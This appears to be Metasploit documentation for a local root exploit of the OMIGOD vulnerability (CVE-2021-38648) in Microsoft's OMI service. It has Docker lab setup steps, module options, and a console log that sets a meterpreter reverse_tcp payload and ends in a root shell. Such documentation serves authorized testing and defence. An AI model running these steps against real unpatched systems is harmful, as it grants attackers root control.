## Vulnerable Application

By removing the authentication exchange, an attacker can issue requests to the local OMI management socket that will
cause it to execute an operating system command as the root user. This vulnerability was patched in OMI version 1.6.8-1
(released September 8th 2021).

## Verification Steps

1. Start the application using the [Censys Dockerfile][1]
    1. `docker build . -t ms-omi:cve-2021-38648`
    2. `docker run -it --entrypoint /bin/bash ms-omi:cve-2021-38648`
    3. `/etc/init.d/omid restart`
2. Start `msfconsole`
3. Obtain a session within the container
    * The `exploit/multi/script/web_delivery` works well for this purpose
5. Do: `use exploit/linux/local/cve_2021_38648_omigod`
6. Set the module options
7. Do: `exploit`
8. You should get a root shell.

## Options

### WritableDir
*This is an advanced option.*

A directory where you can write files. When using the `Linux Dropper` target, this option must be an absolute path and
less than 246 characters long.

### SocketPath
*This is an advanced option.*

The path to the OMI server socket. The default path is `/var/opt/omi/run/omiserver.sock` however when this option is
left blank, it will be determined at runtime.

## Scenarios

### Ubuntu 20.04 x64, OMI v1.6.8, SCX v1.6.6

```
msf > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: smcintyre
meterpreter > background 
[*] Backgrounding session 1...
msf > use exploit/linux/local/cve_2021_38648_omigod 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(linux/local/cve_2021_38648_omigod) > set TARGET Linux\ Dropper 
TARGET => Linux Dropper
msf exploit(linux/local/cve_2021_38648_omigod) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf exploit(linux/local/cve_2021_38648_omigod) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf exploit(linux/local/cve_2021_38648_omigod) > set SESSION 1
SESSION => 1
msf exploit(linux/local/cve_2021_38648_omigod) > check
[*] The target appears to be vulnerable. Version 1.6.8-0 is affected.
msf exploit(linux/local/cve_2021_38648_omigod) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 1.6.8-0 is affected.
[*] Writing '/tmp/zbACyVFZyT' (250 bytes) ...
[*] Writing '/tmp/OJ3FZ2W.py' (3824 bytes) ...
[*] Sending stage (3012548 bytes) to 192.168.159.128
[+] Deleted /tmp/zbACyVFZyT
[+] Deleted /tmp/OJ3FZ2W.py
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.128:51870 ) at 2021-10-27 11:47:48 -0400

meterpreter > getuid
Server username: root
meterpreter > 
```

[1]: https://gist.github.com/dabdine/ac6aadde068cad4d58251453e688a84f
